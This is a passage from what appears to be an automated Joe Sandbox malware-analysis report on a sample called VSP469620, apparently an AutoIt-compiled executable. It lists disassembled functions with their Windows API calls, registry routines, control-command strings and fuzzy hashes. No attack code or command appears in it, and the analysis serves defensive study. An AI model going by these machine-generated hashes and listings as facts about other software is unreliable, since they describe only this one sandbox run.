                                                              • Instruction Fuzzy Hash: 4381D734640215BADB24AF64DE82FFE37BCEF25710F044079F90AAB197EB61DA41D291
                                                              Function 00B1C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00B1C788
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B1C83E
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B1C859
                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00B1CB15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: c0caa1496fea23b4a8e63a486afbbc4991ab3bdc3e6683aec8db2c1494b883a0
                                                              • Instruction ID: e53847de662bd3ff27b8e40c08398d4a1f7d81167c2efe16222b345c9dc91c0f
                                                              • Opcode Fuzzy Hash: c0caa1496fea23b4a8e63a486afbbc4991ab3bdc3e6683aec8db2c1494b883a0
                                                              • Instruction Fuzzy Hash: 95F1C071288305AFD7218F28C886BEABFE4FF49754F540969F598D62A1C774CD80CB91
                                                              Function 00B1638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,00B4DC00), ref: 00B16449
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 3964851224-45149045
                                                              • Opcode ID: 94e07f3bfa44199f1396e8e0b1be7500db631d03bdf32b541924d67703dafa8f
                                                              • Instruction ID: f334877f54431faae9bd797204a65e4e66ecc404e27c602b441f911f6b829faa
                                                              • Opcode Fuzzy Hash: 94e07f3bfa44199f1396e8e0b1be7500db631d03bdf32b541924d67703dafa8f
                                                              • Instruction Fuzzy Hash: ACC190302086458BCB04EF10C691EEE77E5AF95344F54489DF8965B3E3DB20ED8ACB92
                                                              Function 00B1D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 00B1D5AE
                                                              • SetTextColor.GDI32(?,?), ref: 00B1D5B2
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00B1D5C8
                                                              • GetSysColor.USER32(0000000F), ref: 00B1D5D3
                                                              • CreateSolidBrush.GDI32(?), ref: 00B1D5D8
                                                              • GetSysColor.USER32(00000011), ref: 00B1D5F0
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B1D5FE
                                                              • SelectObject.GDI32(?,00000000), ref: 00B1D60F
                                                              • SetBkColor.GDI32(?,00000000), ref: 00B1D618
                                                              • SelectObject.GDI32(?,?), ref: 00B1D625
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00B1D644
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B1D65B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00B1D670
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B1D698
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B1D6BF
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00B1D6DD
                                                              • DrawFocusRect.USER32(?,?), ref: 00B1D6E8
                                                              • GetSysColor.USER32(00000011), ref: 00B1D6F6
                                                              • SetTextColor.GDI32(?,00000000), ref: 00B1D6FE
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B1D712
                                                              • SelectObject.GDI32(?,00B1D2A5), ref: 00B1D729
                                                              • DeleteObject.GDI32(?), ref: 00B1D734
                                                              • SelectObject.GDI32(?,?), ref: 00B1D73A
                                                              • DeleteObject.GDI32(?), ref: 00B1D73F
                                                              • SetTextColor.GDI32(?,?), ref: 00B1D745
                                                              • SetBkColor.GDI32(?,?), ref: 00B1D74F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: 718742826c61a76a208e8366de1d6ba53e6a1bf26fc52cd1f5ee4a4530d605db
                                                              • Instruction ID: 84abbddfeb70643ec18d2e32dd495b242badedb0776a631568e6282bb9e9d7d9
                                                              • Opcode Fuzzy Hash: 718742826c61a76a208e8366de1d6ba53e6a1bf26fc52cd1f5ee4a4530d605db
                                                              • Instruction Fuzzy Hash: AC513C71900218AFDF109FA4EC48EEE7BBAFB08320F214555F915AB2A1DB719A40DF50
                                                              Function 00B1B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B1B7B0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B1B7C1
                                                              • CharNextW.USER32(0000014E), ref: 00B1B7F0
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B1B831
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B1B847
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B1B858
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B1B875
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00B1B8C7
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B1B8DD
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B1B90E
                                                              • _memset.LIBCMT ref: 00B1B933
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B1B97C
                                                              • _memset.LIBCMT ref: 00B1B9DB
                                                              • SendMessageW.USER32 ref: 00B1BA05
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B1BA5D
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00B1BB0A
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00B1BB2C
                                                              • GetMenuItemInfoW.USER32(?), ref: 00B1BB76
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B1BBA3
                                                              • DrawMenuBar.USER32(?), ref: 00B1BBB2
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00B1BBDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: d3f1e47ccd456607473b874a03251f81ca7f113825f88fbb1eab52c89df97689
                                                              • Instruction ID: d3ff76f151faf11b116a61ad3fca4a35bea3d2ec5a30be966cba4e3a94d265f2
                                                              • Opcode Fuzzy Hash: d3f1e47ccd456607473b874a03251f81ca7f113825f88fbb1eab52c89df97689
                                                              • Instruction Fuzzy Hash: 13E19275900218AFDF109F65DC85EEE7BB8FF05710F50819AF919AB290DB748A81CF60
                                                              Function 00B1764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00B1778A
                                                              • GetDesktopWindow.USER32 ref: 00B1779F
                                                              • GetWindowRect.USER32(00000000), ref: 00B177A6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B17808
                                                              • DestroyWindow.USER32(?), ref: 00B17834
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B1785D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1787B
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B178A1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00B178B6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B178C9
                                                              • IsWindowVisible.USER32(?), ref: 00B178E9
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B17904
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B17918
                                                              • GetWindowRect.USER32(?,?), ref: 00B17930
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00B17956
                                                              • GetMonitorInfoW.USER32 ref: 00B17970
                                                              • CopyRect.USER32(?,?), ref: 00B17987
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00B179F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: 444369a61ce49dd705d35e83c20b91149dc9429af70190a937ec0c04d3886749
                                                              • Instruction ID: 9b625c08742572a0e2d6445ddb501553d9e822e1b99e4a7b0ef3983ed210ff43
                                                              • Opcode Fuzzy Hash: 444369a61ce49dd705d35e83c20b91149dc9429af70190a937ec0c04d3886749
                                                              • Instruction Fuzzy Hash: 72B18B71648300AFDB04DF64C989BAEBBE5FF88310F40895DF5999B291DB70E844CB92
                                                              Function 00AF6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AF6CFB
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AF6D21
                                                              • _wcscpy.LIBCMT ref: 00AF6D4F
                                                              • _wcscmp.LIBCMT ref: 00AF6D5A
                                                              • _wcscat.LIBCMT ref: 00AF6D70
                                                              • _wcsstr.LIBCMT ref: 00AF6D7B
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AF6D97
                                                              • _wcscat.LIBCMT ref: 00AF6DE0
                                                              • _wcscat.LIBCMT ref: 00AF6DE7
                                                              • _wcsncpy.LIBCMT ref: 00AF6E12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 95b40efcf83b627ed7e22ca3c590f1cf8262572ce6d9f2e735d2d4482eec9a6f
                                                              • Instruction ID: 284fa7bfeda7cbafa2792e9669a3e6636aef8e2b68715c5d1089d668b728c772
                                                              • Opcode Fuzzy Hash: 95b40efcf83b627ed7e22ca3c590f1cf8262572ce6d9f2e735d2d4482eec9a6f
                                                              • Instruction Fuzzy Hash: 1941E972A04214BFEB04AB74DE47FBF77BCDF45710F14005AFA02A6292EB75DA019661
                                                              Function 00ACA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ACA939
                                                              • GetSystemMetrics.USER32(00000007), ref: 00ACA941
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ACA96C
                                                              • GetSystemMetrics.USER32(00000008), ref: 00ACA974
                                                              • GetSystemMetrics.USER32(00000004), ref: 00ACA999
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00ACA9B6
                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00ACA9C6
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00ACA9F9
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00ACAA0D
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00ACAA2B
                                                              • GetStockObject.GDI32(00000011), ref: 00ACAA47
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACAA52
                                                                • Part of subcall function 00ACB63C: GetCursorPos.USER32(000000FF), ref: 00ACB64F
                                                                • Part of subcall function 00ACB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00ACB66C
                                                                • Part of subcall function 00ACB63C: GetAsyncKeyState.USER32(00000001), ref: 00ACB691
                                                                • Part of subcall function 00ACB63C: GetAsyncKeyState.USER32(00000002), ref: 00ACB69F
                                                              • SetTimer.USER32(00000000,00000000,00000028,00ACAB87), ref: 00ACAA79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 65a17ade05214036999f0cbb7a2253d0f40592f9ec73bd59988b95c3ff5512c1
                                                              • Instruction ID: 4c2b4d6c3b7bfc08c8a153ff9f61607b0fc33b05b8d32cdc44ab6c4b5eacc101
                                                              • Opcode Fuzzy Hash: 65a17ade05214036999f0cbb7a2253d0f40592f9ec73bd59988b95c3ff5512c1
                                                              • Instruction Fuzzy Hash: 63B15D71A0020A9FDB14DFA8ED46FAE7BB4FB18314F124219FA19A7290DB74D841CB61
                                                              Function 00AB2EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Foreground
                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                              • API String ID: 62970417-1919597938
                                                              • Opcode ID: 13cd7c699e8f42c63d5115acef6180ba6d74eefd23907d57c779e2e847467ac3
                                                              • Instruction ID: 873d2673711218c0d924024bd6c53951e7100fe79e9304cb7f2e3df574c0d5e2
                                                              • Opcode Fuzzy Hash: 13cd7c699e8f42c63d5115acef6180ba6d74eefd23907d57c779e2e847467ac3
                                                              • Instruction Fuzzy Hash: 48D1D731108642EFCB04EF20D681AAABBF4FF54344F104A5DF45A971A2DB34E99ACB91
                                                              Function 00B13639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B13735
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B4DC00,00000000,?,00000000,?,?), ref: 00B137A3
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B137EB
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B13874
                                                              • RegCloseKey.ADVAPI32(?), ref: 00B13B94
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00B13BA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: d5198f2c7bffd4617107a0dbda4b723f10f38f799e3d6ff25c897e8b750701e0
                                                              • Instruction ID: f870bd886249a3f8876ef7e47a82cb2d875539c1e965facdcdd3ac8e4c386913
                                                              • Opcode Fuzzy Hash: d5198f2c7bffd4617107a0dbda4b723f10f38f799e3d6ff25c897e8b750701e0
                                                              • Instruction Fuzzy Hash: A4022A752046019FCB14DF24C995E6AB7E9FF88720F14849DF99A9B2A2DB30ED41CB81
                                                              Function 00B16BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00B16C56
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B16D16
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              • API String ID: 3974292440-719923060
                                                              • Opcode ID: f0614d66b82bb60ea0322a627b8d21aad544ed0da25e9313c2849cc7cbadeaa7
                                                              • Instruction ID: 047b648264289f3ba838fa1d8689f82468bcdc7185cb8c3744ea65321d5fc2eb
                                                              • Opcode Fuzzy Hash: f0614d66b82bb60ea0322a627b8d21aad544ed0da25e9313c2849cc7cbadeaa7
                                                              • Instruction Fuzzy Hash: FBA17E312142419FCB14EF24CA92BAAB3E5FF44314F5449ADB856AB3D2DB30ED46CB91
                                                              Function 00AECF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00AECF91
                                                              • __swprintf.LIBCMT ref: 00AED032
                                                              • _wcscmp.LIBCMT ref: 00AED045
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AED09A
                                                              • _wcscmp.LIBCMT ref: 00AED0D6
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00AED10D
                                                              • GetDlgCtrlID.USER32(?), ref: 00AED15F
                                                              • GetWindowRect.USER32(?,?), ref: 00AED195
                                                              • GetParent.USER32(?), ref: 00AED1B3
                                                              • ScreenToClient.USER32(00000000), ref: 00AED1BA
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00AED234
                                                              • _wcscmp.LIBCMT ref: 00AED248
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00AED26E
                                                              • _wcscmp.LIBCMT ref: 00AED282
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                              • String ID: %s%u
                                                              • API String ID: 3119225716-679674701
                                                              • Opcode ID: 4811cf9df1d1f515baa2f96f379994c612aa1310a109d8e56bde52ca9105a3e4
                                                              • Instruction ID: d02b9b011da645aba02a90a942902f91aa592bf548a3de380d9023346467e058
                                                              • Opcode Fuzzy Hash: 4811cf9df1d1f515baa2f96f379994c612aa1310a109d8e56bde52ca9105a3e4
                                                              • Instruction Fuzzy Hash: 92A1F331604346AFD714DF65C984FEAB7A8FF44354F10862AFAAAD3190DB30EA45CB91
                                                              Function 00AED8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00AED8EB
                                                              • _wcscmp.LIBCMT ref: 00AED8FC
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00AED924
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00AED941
                                                              • _wcscmp.LIBCMT ref: 00AED95F
                                                              • _wcsstr.LIBCMT ref: 00AED970
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00AED9A8
                                                              • _wcscmp.LIBCMT ref: 00AED9B8
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00AED9DF
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00AEDA28
                                                              • _wcscmp.LIBCMT ref: 00AEDA38
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00AEDA60
                                                              • GetWindowRect.USER32(00000004,?), ref: 00AEDAC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
